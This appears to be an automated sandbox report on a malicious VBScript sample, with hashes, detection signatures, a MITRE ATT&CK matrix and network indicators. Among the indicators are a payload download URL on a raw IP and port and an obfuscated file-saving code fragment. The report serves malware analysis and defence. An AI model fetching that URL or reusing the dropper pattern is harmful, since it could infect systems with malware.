Loading ...

Play interactive tourEdit tour

Analysis Report Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs

Overview

General Information

Sample Name:Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs
MD5:8491a619dc6e182437bd4482d6e97e3a
SHA1:46d601a56103bf0a623d1c937eab41d8772de644
SHA256:12ed08c4ea5ac7359ede532c672330bcc53589c2e6b932894b68cdf7788bac45

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Potential malicious VBS script found (has network functionality)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5768 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://192.236.147.100:1950/Inufturiols.isoVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbsReversingLabs: Detection: 12%

Networking:

barindex
Potential malicious VBS script found (has network functionality)Show sources
Source: Initial file: BinaryStream.SaveToFile egilprrtbbdfiilnpprttvzzacbbddfhllnnprtt & "\" & hjnpttvbdffhjmoqqsvzzacbbdffhjmmoqssuegg, adSaveCreateOverWrite
Source: Joe Sandbox ViewIP Address: 192.236.147.100 192.236.147.100
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: unknownTCP traffic detected without corresponding DNS query: 192.236.147.100
Source: unknownTCP traffic detected without corresponding DNS query: 192.236.147.100
Source: unknownTCP traffic detected without corresponding DNS query: 192.236.147.100
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1116629504.0000019FE4FD0000.00000004.00000040.sdmp, wscript.exe, 00000000.00000003.1114703153.0000019FE6DF0000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950/Inufturiols.iso
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950/Inufturiols.iso/
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950/Inufturiols.isoU
Source: wscript.exe, 00000000.00000003.1114703153.0000019FE6DF0000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950/Inufturiols.isoj
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950/Inufturiols.isoq
Source: wscript.exe, 00000000.00000003.1104699311.0000019FE4EAB000.00000004.00000001.sdmpString found in binary or memory: http://192.236.147.100:1950/Inufturiols.isowFE
Source: wscript.exe, 00000000.00000002.1116155840.0000019FE4E8D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com

Source: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal68.evad.winVBS@1/0@0/1
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\nvreadmmJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs'
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbsReversingLabs: Detection: 12%
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.1116155840.0000019FE4E8D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW2n
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.1113989505.0000019FE4EC8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1116155840.0000019FE4E8D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0]
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.236.147.100 158Jump to behavior

Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting121Winlogon Helper DLLProcess Injection1Masquerading1Credential DumpingSecurity Software Discovery1Application Deployment SoftwareData from Local SystemData CompressedData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesProcess Injection1Network SniffingSystem Information Discovery2Remote ServicesData from Removable MediaExfiltration Over Other Network MediumFallback ChannelsExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionScripting121Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.